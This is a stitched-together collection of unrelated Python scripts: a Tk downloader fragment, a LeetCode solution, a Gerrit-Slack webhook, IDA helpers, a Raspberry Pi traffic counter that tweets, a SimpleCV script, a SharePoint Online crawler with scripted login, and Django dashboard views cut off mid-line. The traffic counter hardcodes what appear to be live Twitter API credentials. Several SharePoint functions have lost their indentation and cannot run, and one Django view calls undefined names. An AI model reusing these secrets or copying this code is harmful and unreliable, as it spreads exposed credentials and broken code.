    # Minimal Tk UI: a URL entry plus download / exit buttons
    window = Tk()
    window.geometry("300x300")
    url_text = Entry()
    url_text.pack()
    Button(window, text="download", command=download).pack()
    Button(window, text="exit", command=windowExit).pack()
    window.mainloop()
|
# https://leetcode.com/problems/max-number-of-k-sum-pairs/
from typing import List
from collections import Counter
class Solution:
    def maxOperations(self, nums: List[int], k: int) -> int:
        """Return the max number of pairs summing to k (each element used once).

        Every unordered pair (a, k-a) with a != k-a is counted once from each
        side, so the running total is halved at the end; the a == k-a case
        contributes its full frequency once, and floor-halving yields the
        correct number of self-pairs.
        """
        freqs = Counter(nums)
        doubled = sum(min(cnt, freqs[k - val]) for val, cnt in freqs.items())
        return doubled // 2
def main():
    """Quick manual check of Solution.maxOperations."""
    nums = [2, 5, 4, 4, 1, 3, 4, 4, 1, 4, 4, 1, 2, 1, 2, 2, 3, 2, 4, 2]
    print(Solution().maxOperations(nums, 3))


if __name__ == '__main__':
    main()
|
#!/usr/bin/env python
#
# Copyright (c) 2014, Aleksey Didik <aleksey.didik@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""
Gerrit Slack Integration Webhook for change-merge
"""
__author__ = "Aleksey Didik"
__author_email__ = "aleksey.didik@gmail.com"
# Configuration section
# Gerrit parameters are necessary to retrieve the commit message and author
# Gerrit SSH port (default is 29418)
GERRIT_PORT = 29418
# Gerrit user@host
# Gerrit user what will be used to query gerrit for commit messages.
# Be sure you put ~/.ssh/id_rsa.pub to SSH Public Keys in this user Settings in Gerrit WebUI.
GERRIT_SERVER = "user@host"
# Webhook URL provided by Incoming Webhook integration of Slack
SLACK_WEBHOOK_URL = "https://<token>.slack.com/services/hooks/incoming-webhook?token=<token>"
# Mapping #channel to Gerrit projects.
# One channel can be mapped on several projects.
# Regular expressions may be used to match project names.
# E.g. to map all projects to general and #web channel
# to projects web-project and web-design set:
# {"gerrit": [".*"], "web": ["web-project", "web-design"]}
CHANNEL_MAPPING = {"#gerrit": [".*"]}
# emoji icon to be used in a message.
# set value "" to use Slack defined icon
ICON_EMOJI = ":white_check_mark:"
# End of configuration section
import json
import time
import urllib
import urllib2
import subprocess
import re
from optparse import OptionParser
def getCommitInfo(commit_hash):
    """Query Gerrit over SSH for the given commit.

    Returns a (commit_message, owner_name) tuple; on any failure returns an
    error description in place of the message and "unknown user" as owner,
    instead of raising.
    """
    try:
        # 'gerrit query --format json' prints one JSON object per line;
        # the first line is the change itself (the last is a stats record)
        result = json.loads(
            subprocess.Popen(
                ["ssh", "-p", str(GERRIT_PORT), GERRIT_SERVER, "gerrit", "query", "--commit-message", "--format", "json", commit_hash],
                stdout=subprocess.PIPE
            ).communicate()[0].splitlines()[0]
        )
        return (result["commitMessage"], result["owner"]["name"])
    except Exception, e:  # Python 2 except syntax; this file targets py2
        return ("Failed getting commit message, %s: %s" % (
                    e.__class__.__name__, e),
                "unknown user")
def webhook(channel, project, branch, name, change_url, message, submitter):
    """Post a change-merged notification to a Slack incoming webhook.

    The pretext links the change URL with the first line of the commit
    message; 'fallback' is the plain-text version Slack shows where
    attachments are not rendered.
    """
    data = {
        "channel": channel,
        "pretext": "@{0} has merged change <{1}|{2}>".format(submitter, change_url, message.splitlines()[0]),
        "color": "#00D000",
        "fields": [
            {
                "title": "Author",
                "value": name,
                "short": "true"
            },
            {
                "title": "Project",
                "value": project,
            },
            {
                "title": "Branch",
                "value": branch,
            },
        ],
        # Make @mentions in the text resolve to real Slack users
        "link_names": 1,
        "fallback": "@{0} has merged change {1}\n Author: {2}\n Project: {3}\n Branch: {4}\n Link: {5}"
                    .format(submitter, message, name, project, branch, change_url)
    }
    if ICON_EMOJI != "":
        data["icon_emoji"] = ICON_EMOJI
    # Slack expects a form-encoded 'payload' field carrying the JSON body
    urllib2.urlopen(SLACK_WEBHOOK_URL, urllib.urlencode({"payload": json.dumps(data)})).read()
def main():
    """Parse the Gerrit change-merged hook arguments and notify Slack.

    Each channel in CHANNEL_MAPPING is notified when any of its project
    regexps matches the merged change's project.
    """
    parser = OptionParser(usage="usage: %prog <required options>")
    parser.add_option("--change", help="Change identifier")
    parser.add_option("--change-url", help="Change url")
    parser.add_option("--project", help="Project path in Gerrit")
    parser.add_option("--branch", help="Branch name")
    # NOTE(review): --topic is accepted but never used below — confirm
    parser.add_option("--topic", help="Topic name")
    parser.add_option("--submitter", help="Submitter")
    parser.add_option("--commit", help="Git commit hash")
    options, args = parser.parse_args()
    message, name = getCommitInfo(options.commit)
    for channel in CHANNEL_MAPPING:
        for project_re in CHANNEL_MAPPING[channel]:
            if re.compile(project_re).match(options.project):
                webhook(channel, options.project, options.branch, name, options.change_url, message, options.submitter)


if __name__ == "__main__":
    main()
|
from ida_kernwin import *
from netnode import Netnode
class ActionHandler(action_handler_t):
    """IDA action handler that delegates to a plain callable.

    handler: called with the action context when the action is activated
    disable: optional predicate; the action is disabled while it returns True
    enable:  optional predicate, or an AST_* int returned as-is;
             takes precedence over 'disable'
    """
    def __init__(self, handler, disable = None, enable = None):
        action_handler_t.__init__(self)
        self.disable = disable
        self.enable = enable
        self.handler = handler
    # Delegate activation to the wrapped callable.
    def activate(self, ctx):
        return self.handler(ctx)
    # Compute availability from the enable/disable predicates.
    def update(self, ctx):
        if self.enable:
            # An int is assumed to already be an AST_* constant
            if type(self.enable) is int:
                return self.enable
            return AST_ENABLE if self.enable() else AST_DISABLE
        if self.disable:
            return AST_DISABLE if self.disable() else AST_ENABLE
        return AST_ENABLE_ALWAYS
def add_menu_item(menu_path, label, action_name, handler, shortcut = '', tooltip = ''):
    """Register an IDA action and attach it to the given menu path.

    Returns the result of attach_action_to_menu (True on success).
    """
    # Register the action
    # NOTE(review): the registration result r is ignored; attachment is
    # attempted even if registration failed — confirm intended
    r = register_action(action_desc_t(
        action_name,   # The action name. This acts like an ID and must be unique
        label,         # The action text.
        handler,       # The action handler
        shortcut,      # Optional: the action shortcut
        tooltip,       # Optional: the action tooltip (available in menus/toolbar)
        # Optional: the action icon (shows when in menus/toolbars) use numbers 1-255
    ))
    return attach_action_to_menu(menu_path, action_name, SETMENU_APP)
def idb_get(key, val = None):
    """Read a value persisted in the IDB under the WormTools netnode."""
    node = Netnode('WormTools')
    return node.get(key, val)


def idb_set(key, val):
    """Persist a value in the IDB under the WormTools netnode."""
    node = Netnode('WormTools')
    node[key] = val
from threading import Thread, Event
import datetime
import RPi.GPIO as GPIO
import time
import sys
import tweepy, time

# SECURITY(review): live Twitter API credentials are hardcoded below and
# committed to source control — they should be revoked and moved to
# environment variables or a config file outside the repository.
auth = tweepy.OAuthHandler('6jj33wAEIhdQGLazNeWunjez8', 'dgNUJbzBEVfhr8ShGPeJRK4ecNlKXRKLtzx48y2agjynrBealh')
auth.set_access_token('166842701-iV01OtWPDkjQybnZuEIf1GWp0vc5fI71lz7LOfB2', 'FC7DpSxVuU7uKN2E0BE8G0rrz4h4I6NtDanxI3VOMLHas')
api = tweepy.API(auth)

# Two input pins (board numbering) with pull-ups; each counts traffic events
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
GPIO.setup(8, GPIO.IN,
           pull_up_down=GPIO.PUD_UP)
GPIO.setup(10, GPIO.IN,
           pull_up_down=GPIO.PUD_UP)

# Shared stop signal and per-route counters for the two polling threads
event = Event()
counter1 = 0
counter2 = 0
def route1():
    """Count rising edges on pin 8; stop at 20 or when the event is set."""
    global counter1
    old = True
    while not event.is_set():
        level = GPIO.input(8)
        # rising edge: pin was low on the previous poll, high now
        if level and not old:
            counter1 += 1
            print("Counter 1: {}".format(counter1))
        old = level
        if counter1 == 20:
            event.set()
            return
def route2():
    """Count rising edges on pin 10; stop at 3 or when the event is set."""
    global counter2
    old = True
    while not event.is_set():
        level = GPIO.input(10)
        # rising edge: pin was low on the previous poll, high now
        if level and not old:
            counter2 += 1
            print("Counter 2: {}".format(counter2))
        old = level
        if counter2 == 3:
            event.set()
            return
def main():
    # Repeat count-and-tweet cycles forever
    while True:
        run()
def run():
    """Run one counting race between the two routes and tweet the winner."""
    global counter1
    global counter2
    # FIX: the counters were never reset, so after the first cycle the
    # '== 20' / '== 3' tests in route1/route2 could never fire again
    counter1 = 0
    counter2 = 0
    t1 = Thread(target=route1)
    t2 = Thread(target=route2)
    t1.start()
    t2.start()
    event.wait()
    # Let both threads observe the event and exit before reading/clearing
    t1.join()
    t2.join()
    print("Route 1: {}, Route 2: {}".format(counter1, counter2))
    if counter1 > counter2:
        tweet = ("Take Route 885")
    elif counter2 > counter1:
        tweet = ("Take Streets Run Road")
    else:
        tweet = ("Both routes the same")
    # Prefix a timestamp so successive tweets are never duplicates
    now = str(datetime.datetime.now())
    tweet = now+" "+tweet
    print(tweet)
    print("tweeting")
    api.update_status(tweet.strip())
    time.sleep(1)
    event.clear()
if __name__ == "__main__":
    # Run the count-and-tweet loop only when executed directly
    main()
|
from SimpleCV import *
#import Image, Color, time

# Experimental SimpleCV script: binarize an image, find blobs and report /
# save them.  The commented-out sections below are earlier experiments.
disp = Display()
img = Image("images/egg.jpg")
#img2 = img.colorDistance((71,57,45))
img5 = img.toGray()
img2 = img5.binarize()
# findBlobs() returns a FeatureSet of blobs (or None if none are found)
img3 = img2.findBlobs()
#img4 = img3.resize(500,500)
#img4 = img3.scale(500,500)
print("Image in binary: ", img2)
print("Area: ", img3.area())
print("Angle: ", img3.angle())
print("Coordinate: ", img3.coordinates())
for x in img3:
    print("Saving ", x)
    # NOTE(review): Image.save does not take three positional args like
    # this; presumably "picture" + str(x) + ".jpg" was intended — confirm
    x.save("picture",x,".jpg")
    #x.show()
    #time.sleep(1)
#img3.show(width=1)
#img3.save(disp)
#time.sleep(10)
#img = img.drawText("Hello World!")
#while True:
    #img2 = img.toGray()
    #img3 = img2.binarize()
    #img4 = img2.edges()
    #img5 = img.findBlobs()
    #for blob in blobs:
    #    blob.draw()
    #    if img.mouseLeft:
    #        break
    #img = img.resize(500,500)
    #img.show()
    #img.save(disp)
    #time.sleep(5)
#cam = camera(0, { "width": 640, "height": 480 })
#img2 = cam.getImage()
#img2.save(disp)
#img2 = img2.resize(500,500)
#img2.show()
#time.sleep(5)
#img5.show()
#img5.save(disp)
|
# -*- coding: utf-8 -*-
""" e-coucou 2015

SharePoint crawler (Python 2): walks a document library over the REST API
and writes a CSV inventory of folders and files.
"""
import requests, lxml, json, urllib, sys, argparse, getpass, time
from lxml import html,etree
from requests_ntlm import HttpNtlmAuth

DEBUG = 0
OUTSIDE = 0
level = 0
# Global counters: folders seen, files seen, cumulated file size (bytes)
g_cnt = 0
g_file = 0
g_size = 0
# Crawl log (URLs queried), written as the crawl progresses
flog=open('sharepoint.log','w')
#----------------
def aff(str,val):
    """Debug helper: print a label / value pair."""
    # NOTE(review): the first parameter shadows the builtin str
    print '- >>',str,val
    return


def reponse(rep,code):
    """Dump a requests response (request, redirects, headers, cookies) for debugging."""
    print '#',code,'########################################################'
    print 'cde : ----'
    print rep.request.url
    for hh in rep.request.headers:
        print hh,'=',rep.request.headers[hh]
    print 'rep : ----'
    print rep.history
    # Show every intermediate redirect response, if any
    if rep.history:
        for rp in rep.history:
            print rp.status_code, rp.url
            print '/'
            print rp.cookies
            print rp.content
    print '[',rep.status_code,']'
    print ' -- headers --'
    for hh in rep.headers:
        print hh,'=',rep.headers[hh]
    print ' -- cookies --'
    for cc in rep.cookies:
        print cc,'='
    print ' - -url --'
    print rep.url
    return
def decode_folder(session,source,level,folder):
global g_cnt
try:
xml = lxml.etree.fromstring(source)
except:
sys.stdout('#')
sys.stdout.flush()
print source
nsmap = {'atom': 'http://www.w3.org/2005/Atom','d': 'http://schemas.microsoft.com/ado/2007/08/dataservices','m': 'http://schemas.microsoft.com/ado/2007/08/dataservices/metadata'}
cnt=0
for m in xml.xpath("//atom:entry/atom:content/m:properties", namespaces=nsmap):
cnt = cnt + 1
g_cnt = g_cnt + 1
N = m.find('d:Name', namespaces=nsmap)
L = m.find('d:ServerRelativeUrl', namespaces=nsmap)
I = m.find('d:ItemCount', namespaces=nsmap)
U = m.find('d:UniqueId', namespaces=nsmap)
rep = urllib.quote(L.text.encode('windows-1252'))
ligne = 'd;'+urllib.unquote(folder.encode("windows-1252"))+';"'+N.text.encode('windows-1252')+'";"'+args.site+rep+'";'+I.text+';'+U.text+';'+rep+'\n'
fo.write(ligne)
recurse_dir(session,rep,level)
return
def read_files(session, folder, level):
    # Query the SharePoint REST API for the files directly inside `folder` and
    # append one 'f;' CSV line per file to the global output file `fo`.
    # Relies on module globals: args, p (proxies), h (headers), c (cookies), fo.
    global g_file, g_size, flog
    url = args.site + args.url +"_api/Web/GetFolderByServerRelativeUrl('"+folder+"')/files"
    flog.write(url+'\n')
    requete = session.get(url, proxies=p, verify=True,allow_redirects=True, headers = h, cookies = c)
    xml = lxml.etree.fromstring(requete.content)
    nsmap = {'atom': 'http://www.w3.org/2005/Atom','d': 'http://schemas.microsoft.com/ado/2007/08/dataservices','m': 'http://schemas.microsoft.com/ado/2007/08/dataservices/metadata'}
    for m in xml.xpath("//atom:entry/atom:content/m:properties", namespaces=nsmap):
        g_file = g_file + 1
        N = m.find('d:Name', namespaces=nsmap)               # file name
        # L = m.find('atom:id', namespaces=nsmap)
        L = m.find('d:ServerRelativeUrl', namespaces=nsmap)  # server-relative path
        I = '1'                                              # item count: always 1 for a file
        U = m.find('d:UniqueId', namespaces=nsmap)           # SharePoint GUID
        # NOTE(review): the URL is quoted as UTF-8 here, but names are encoded
        # windows-1252 below (and decode_folder quotes windows-1252) — confirm
        # the mixed encodings are intentional.
        rep = urllib.quote(L.text.encode('utf-8'))
        z = m.find('d:Length', namespaces=nsmap)             # file size in bytes
        ligne = 'f;'+urllib.unquote(folder)+';"'+N.text.encode('windows-1252')+'";"'+args.site+rep+'";'+I+';'+U.text+';'+rep+';'+z.text+'\n'
        try:
            g_size = g_size + int(z.text)
        except:
            # Unparsable size: flag it with '#' but still write the CSV line.
            sys.stdout.write('#')
        fo.write(ligne)
        sys.stdout.write('.')   # progress: one dot per file
        sys.stdout.flush()
    return
def recurse_dir(session,folder,level):
global fo
sys.stdout.write('+')
sys.stdout.flush()
level = level + 1
read_files(session,folder,level)
url = args.site + args.url +"_api/Web/GetFolderByServerRelativeUrl('"+folder+"')/folders"
flog.write(url+'\n')
try:
requete = session.get(url, proxies=p, verify=True,allow_redirects=True, headers = h, cookies = c)
except:
sys.stdout.write('#')
sys.stdout.flush()
print url
decode_folder(session,requete.content,level,folder)
level = level - 1
return level
def get_folder(session, folder):
    # Entry point for the crawl: open '<folder>.csv', write the CSV header,
    # recursively walk the library, then print the final counters.
    global fo
    name= folder+'.csv'
    fo = open(name,'w')
    fo.write('type;repertoire;nom;lien;id;qte;rel_url;taille\n')
    print '--------------------------------------------------------------------------'
    print '- lecture de repertoire / bibliotheque'
    print ''
    bibli = args.url+folder
    # NOTE(review): recurse_dir is called with the global session `s`, not the
    # `session` parameter — confirm which one is intended.
    level = recurse_dir(s,bibli,0)
    print ''
    print ''
    print '- total de repertoires :',g_cnt
    print '- total de fichiers :',g_file
    print '- soit : ', g_cnt+g_file,'elements'
    fo.close()
    return
def get_token():
    # Authenticate against SharePoint Online (WS-Federation / SAML flow, with
    # an optional NTLM variant) and leave the session cookies on the global
    # session `s`. Returns 1 on success, 2 on HTTP 404, 0 on request failure.
    global s, p, h, c
    print '--------------------------------------------------------------------------'
    print '- Start login ...'
    print '-'
    u = args.site + args.url+ urllib.quote(args.bibliotheque)
    if OUTSIDE :
        # Outside the corporate network: disable the proxy.
        p= ''
        aff('NO PROXY : Outside mode enable.','')
    if NTLM :
        aff('NTLM : mode enable.','')
    h = {'User-Agent' : 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11'}
    h1 = { 'Connection' : 'keep-alive' , 'Upgrade-Insecure-Requests' : '1' , 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36' , 'Accept-Encoding' : 'gzip, deflate, sdch', 'Accept-Language' : 'fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4'}
    h3 = { 'Accept' : 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With' : 'XMLHttpRequest' }
    if VERBOSE : aff('First url to', args.site)
    try:
        # Initial request: follows the redirect chain to the login page.
        r = s.get(u, proxies=p, verify = True,allow_redirects=True, headers= h1)
    except:
        return 0
    if DEBUG : reponse(r,1)
    if r.status_code == 404 : return 2
    r2 = s.get(r.url, proxies=p, verify=True,allow_redirects=True, headers = h1 ) #, cookies = c)
    if DEBUG : reponse(r2,2)
    # Scrape the hidden login context + flow token from the login page HTML.
    b = r2.content
    tree = lxml.html.fromstring(b)
    elements = tree.get_element_by_id('cred_hidden_inputs_container')
    ctx = elements[0].value
    flowtoken = elements[1].value
    l = "https://login.microsoftonline.com/common/userrealm/?user="+args.email+"&api-version=2.1&stsRequest="+ctx+"&checkForMicrosoftAccount=true"
    if VERBOSE :
        aff('Get info from redirect to login.microsoftonline.com.','')
        aff('CTX ->',ctx)
        aff('Flowtoken ->',flowtoken)
        aff('url : ',l)
        aff('Get STS url from microsoft online (json response)','')
    h1.update(h3)
    c = {}
    # Ask Microsoft Online for the federated STS URL (JSON reply).
    r3 = s.get(l, proxies=p, verify=True,allow_redirects=True , headers = h1 , cookies=c)
    if DEBUG : reponse(r3,3)
    #print r3.content
    #-- debug
    try:
        j = json.loads(r3.content)
        ad = j['AuthURL']+ "&popupui="
        if VERBOSE : aff('URL OK in json reply.','')
    except:
        # NOTE(review): if json parsing fails, `ad` is undefined here — this
        # aff() call itself raises NameError. Consider reporting r3.content.
        aff('URL ERREUR:',ad)
    c = {}
    if not NTLM :
        if VERBOSE : aff('get SAML token','')
        r4 = s.get(ad, proxies=p, verify=True,allow_redirects=True, headers = h, cookies = c)
    else:
        if VERBOSE : aff('get NTLM token','')
        r4 = s.get(ad, proxies=p, verify=True,allow_redirects=True, auth = auth, headers = h, cookies = c)
    if DEBUG: reponse(r4,4)
    if not NTLM :
        # Form-based login with username/password: the same credentials as the
        # proxy. Assumes the proxy and Active Directory are synchronized and
        # belong to the same DOMAIN.
        b = r4.content
        tree = lxml.html.fromstring(b)
        vs = tree.get_element_by_id("__VIEWSTATE").value #
        ev = tree.get_element_by_id("__EVENTVALIDATION").value #
        db = tree.xpath('//input/@value')[2]
        # Maybe prepend the domain name to the username.
        data = '__VIEWSTATE='+urllib.quote(vs)+'&__EVENTVALIDATION='+urllib.quote(ev)+'&__db='+db+'&ctl00%24ContentPlaceHolder1%24UsernameTextBox='+urllib.quote(auth.username)+'&ctl00%24ContentPlaceHolder1%24PasswordTextBox='+urllib.quote(auth.password)+'&ctl00%24ContentPlaceHolder1%24SubmitButton=Connexion'
        h1.update({'Content-Type' : 'application/x-www-form-urlencoded'})
        if VERBOSE: aff('data : ', data)
        p1 = s.post(ad, data = data, allow_redirects=True, cookies=c, headers = h1)
    else:
        p1 = s.post(r4.url, allow_redirects=True, auth=auth, cookies=c, headers = h1) # no request body: NTLM handles auth
    if VERBOSE : aff('POST Credentials to STS ','')
    # Extract the WS-Federation reply (wa / wresult / wctx hidden inputs).
    if not NTLM :
        tree = lxml.html.fromstring(p1.content)
    else:
        tree = lxml.html.fromstring(r4.content)
    wa = tree.xpath('//input/@value')[0]
    wresult = tree.xpath('//input/@value')[1]
    wctx = tree.xpath('//input/@value')[2]
    data = 'wa='+wa+'&wresult='+urllib.quote(wresult)+'&wctx='+urllib.quote(wctx)
    if VERBOSE :
        aff('cookies : AUTH --------------->>>','')
        aff('MSIAuth:',p1.cookies['MSISAuth'])
        aff('Get SAML token to microsoft login.srf in order to get rtFa et FedAuth','')
    # Exchange the SAML token at login.srf for the SharePoint session token.
    mic="https://login.microsoftonline.com/login.srf"
    if VERBOSE : print mic
    p2 = s.post(mic, data = data, auth=auth, allow_redirects=True, headers = h1, cookies=c)
    tree = lxml.html.fromstring(p2.content)
    t = tree.xpath('//input/@value')[0]
    data = 't='+urllib.quote(t)
    if VERBOSE :
        aff('SAML Token from Microsoft Online',data)
    # Final hop: posting the token here sets the rtFa / FedAuth session cookies.
    ad = args.site+'/_forms/default.aspx?apr=1&wa=wsignin1.0'
    p3 = s.post(ad, data = data, allow_redirects=True, headers = h1, cookies=c)
    if VERBOSE :
        aff('Get rtFa & FedAuth session token to identify next requests','')
        aff(p3.status_code, p3.history)
        aff('rtFa =',p3.cookies['rtFa'])
        aff('FedAuth =',p3.cookies['FedAuth'])
    aff('Successfull Authentication','')
    aff('-------------------------------------------------------------- <fin> -','')
    return 1
def get_args():
global auth, p
global args
global DEBUG, OUTSIDE, VERBOSE, NTLM
parser = argparse.ArgumentParser()
parser = argparse.ArgumentParser(description='Liste les bibliotheques SharePoint dans un fichier csv')
parser.add_argument("bibliotheque",help="renseignez le nom de la bibliotheque")
parser.add_argument("-p","--proxy",default='proxy.my-org.local:8080',help="si vous etes derriere un proxy =1")
parser.add_argument("-e","--email",default='first.name@my-org.com',help="adresse mail")
parser.add_argument("-s","--site",default='https://my-org.sharepoint.com',help="adresse sharepoint du serveur -> ex: https://my.sharepoint.com")
parser.add_argument("-u","--url",default='/sites/team/',help="reference relative du site sharepoint : /sites/.../")
parser.add_argument("-d","--debug",default=False,action="store_true", help="=1 en mode DEBUG" )
parser.add_argument("-O","--Outside",default= False , action="store_true" ,help="par defaut NO Proxy")
parser.add_argument("-N","--NTLM",default= False , action="store_true" ,help="mettre l'option pour passer en mode NTLM")
parser.add_argument("-U","--username",default="eric",help="username")
parser.add_argument("-D","--Domaine",default="MYORG",help="Domaine de l'Active Directory")
parser.add_argument("-P","--Password",default="",help="password")
parser.add_argument("-v","--verbose",default=False,action="store_true",help="toutes les infos ...")
args = parser.parse_args()
Password = args.Password
if args.Password == "" :
Password = getpass.getpass(prompt="Entrez votre mot de passe Windows")
proxy = args.username+':'+Password+'@'+args.proxy
p={'http': 'http://'+proxy , 'https':'https://'+proxy}
auth = HttpNtlmAuth(args.Domaine+'\\'+args.username,Password)
OUTSIDE = args.Outside
NTLM = args.NTLM
DEBUG = args.debug
VERBOSE = args.verbose
if VERBOSE :
# print auth.username, auth.password
print '--------------------------------------------------------------------------'
aff('Arguments ...','')
aff('Username :',args.Domaine+'/'+args.username)
aff('eMail :',args.email)
aff('Site https :',args.site)
aff('proxy : ',proxy)
aff('Bibliotheques :',args.bibliotheque)
return
if __name__ == "__main__":
    # Parse CLI options, authenticate against SharePoint Online, then crawl
    # the requested document library and report timing/size statistics.
    get_args()
    s = requests.Session()
    t0 = time.time()
    token = get_token()
    if token == 1 :
        t1 = time.time()
        get_folder(s,urllib.quote(args.bibliotheque))
        tf=time.time()
        print ''
        print '- résolution authentication : {0:.2f} secondes'.format(t1-t0)
        print '- scanning Bibliotheque en {0:.2f} secondes'.format(tf-t1)
        print '- pour une taille de {0:.2f} Go'.format(g_size/1024.0/1024.0/1024.0)
        print '- Perfomance : {0:.1f} ms/elements'.format( (tf-t1)/(g_cnt+g_file)*1000.0 )
        print ''
        print '-\n- by e-coucou 2015'
    elif token == 2 :
        print '404: file not found (bibliotheque, url)'
    elif token == 0 :
        print 'Erreur: invalid request (proxy, site)'
    flog.close()
from django.shortcuts import render, redirect, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect, JsonResponse
from .forms import Loginform,RowProduitsForm, RowClientsForm
from .models import Pumal, Clients, Produit, Wilaya
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from .filter import PumalFilter, ClientsFilter, NumberFilter
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.contrib.auth.models import User
from django.db.models import Count, Q, Sum, F
from django.views.generic import TemplateView
from django.db.models.functions import TruncMonth, ExtractMonth, Coalesce
import json
@login_required(login_url='Login')
def index(request):
    # Dashboard landing page; the product listing below is currently disabled.
    #AllProduits = Pumal.objects.all().order_by('-id')
    #context = {'AllProduits': AllProduits}
    return render(request,"indexDASH.html")
@login_required(login_url='Login')
def index2(request):
    """Filterable, paginated list of Pumal rows (5 per page)."""
    # Fix: an initial `Pumal.objects.all().order_by('-id')` assignment was dead —
    # it was immediately overwritten by the filtered queryset below.
    myFilter = PumalFilter(request.GET, queryset=Pumal.objects.all())
    AllProduits_list = myFilter.qs
    paginator = Paginator(AllProduits_list, 5)  # 5 rows per page
    page_number = request.GET.get('page')
    page_object = paginator.get_page(page_number)
    # Both the full filtered list and the page object are exposed; the template
    # may rely on either.
    context = {'AllProduits': AllProduits_list,
               'myFilter': myFilter,
               'page_object': page_object}
    return render(request, "home3.html", context)
@login_required(login_url='Login')
def index3(request, page=1):
    """Filterable, paginated list of Clients rows (5 per page)."""
    # Fix: an initial `Clients.objects.all().order_by('-id')` assignment was
    # dead — immediately overwritten by the filtered queryset below.
    my_filter = ClientsFilter(request.GET, queryset=Clients.objects.all())
    AllClients_list = my_filter.qs
    paginator = Paginator(AllClients_list, 5)  # 5 rows per page
    page_number = request.GET.get('page')
    page_obj = paginator.get_page(page_number)
    context = {'AllClients': AllClients_list,
               'myFilter': my_filter,
               'page_obj': page_obj,
               }
    return render(request, "home4.html", context)
def pagelogin(request):
    """Authenticate the user.

    On success redirect to 'Revendeurs'; otherwise re-render the login page
    (with an error message when the credentials were wrong).
    """
    log_form = Loginform()
    if request.method == "POST":
        log_form = Loginform(request.POST or None)
        if log_form.is_valid():
            user = authenticate(
                username=log_form.cleaned_data.get("username"),
                password=log_form.cleaned_data.get("password"),
            )
            if user is not None:
                login(request, user)
                return redirect('Revendeurs')
            context = {'form': log_form,
                       'error': 'The username and password combination is incorrect'}
            return render(request, 'login.html', context)
        # Fix: a POST with an invalid form previously fell through and the view
        # returned None (a server error). Re-render the bound form instead.
    context = {'form': log_form}
    return render(request, 'login.html', context)
#def create_product(request):
#form = ProductForm(request.POST or None)
#if form.is_valid():
#form.save()
#form = ProductForm()
#context = {
# 'form': form
#}
#return render(request, "first.html", context)
@login_required(login_url='Login')
def create_product(request):
    # NOTE(review): `RowProductForm` and `Products` are not imported or defined
    # in this module (the imports provide RowProduitsForm and Pumal), so calling
    # this view raises NameError. It looks like a leftover twin of
    # creer_produits — confirm whether it should be removed or repointed.
    my_form = RowProductForm()
    if request.method == "POST":
        my_form = RowProductForm(request.POST or None)
        if my_form.is_valid():
            print(my_form.cleaned_data)
            Products.objects.create(**my_form.cleaned_data )
            my_form = RowProductForm()
    context = {
        'form': my_form
    }
    return render(request, "first.html", context)
def pagelogout(request):
    """Log the user out (POST only) and send them back to the login page.

    GET requests also redirect, so the view never returns None.
    """
    if request.method == "POST":
        logout(request)
    return redirect('Login')
@login_required(login_url='Login')
def creer_produits(request):
    """Display/process the Pumal creation form.

    On a valid POST, insert one row and present a fresh blank form; on an
    invalid POST the bound form (with its errors) is re-rendered.
    """
    produit_form = RowProduitsForm()
    if request.method == "POST":
        produit_form = RowProduitsForm(request.POST or None)
        if produit_form.is_valid():
            print(produit_form.cleaned_data)  # debug trace of submitted values
            Pumal.objects.create(**produit_form.cleaned_data)
            produit_form = RowProduitsForm()  # blank form after a successful save
    return render(request, "first.html", {'form': produit_form})
@login_required(login_url='Login')
def clients(request):
    """Display/process the client creation form.

    On a valid POST, insert one Clients row and present a fresh blank form;
    on an invalid POST the bound form (with its errors) is re-rendered.
    """
    client_form = RowClientsForm()
    if request.method == "POST":
        client_form = RowClientsForm(request.POST or None)
        if client_form.is_valid():
            print(client_form.cleaned_data)  # debug trace of submitted values
            Clients.objects.create(**client_form.cleaned_data)
            client_form = RowClientsForm()  # blank form after a successful save
    return render(request, "first.html", {'form': client_form})
def count_client(request):
    # Dashboard numbers: total clients, client counts per région code
    # ("1"/"2"/"3" → the ouest/centre/est aggregate names below), and
    # per-product ordered quantities split by region, filterable via GET.
    count_all = Clients.objects.all().count()
    count_ouest = Clients.objects.all().filter(région="1").count()
    count_centre = Clients.objects.all().filter(région="2").count()
    count_est = Clients.objects.all().filter(région="3").count()
    produit_nom = Produit.objects.all()
    #produit_count= Pumal.objects.all().filter(région="1",date__contains="09").aggregate(Sum('commande'))
    mynumberFilter = NumberFilter(request.GET, queryset=Pumal.objects.all())
    AllProduits_list = mynumberFilter.qs
    # Per-product 'commande' totals by region over the filtered queryset;
    # Coalesce turns the NULL of an empty group into 0.
    produit_count = AllProduits_list.values('designation__nom').annotate(
        ouest_commande=Coalesce(Sum('commande', filter=Q(région="1")), 0),
        centre_commande=Coalesce(Sum('commande', filter=Q(région="2")), 0),
        est_commande=Coalesce(Sum('commande', filter=Q(région="3")), 0)).order_by("-designation__nom")
    # Same aggregation, additionally annotated with the month of 'date'.
    produit_count2 = AllProduits_list.values('designation__nom').annotate(
